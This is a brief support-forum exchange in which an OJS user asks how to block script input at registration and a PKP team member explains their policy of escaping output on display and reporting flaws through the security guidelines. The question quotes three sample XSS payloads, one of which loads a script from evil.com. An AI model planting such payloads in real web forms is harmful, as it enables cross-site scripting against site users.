Hello
We are using OJS-3.3.0-12 and want to prevent script-type data from entering during registration or public data entry like authors.
Ex. <body background=“javascript:alert(“XSS”)”>, < script src=http://evil.com/xss.js>< /script >, < script> alert(“XSS”); < /script >
Hi @shantanusingh,
Our policy is not to filter content on entry, but to filter it appropriate to its use when it is displayed or exported. If you see a place where data is not correctly escaped on display or export, please report it following our security guidelines: ojs/SECURITY.md at main · pkp/ojs · GitHub
Regards,
Alec Smecher
Public Knowledge Project Team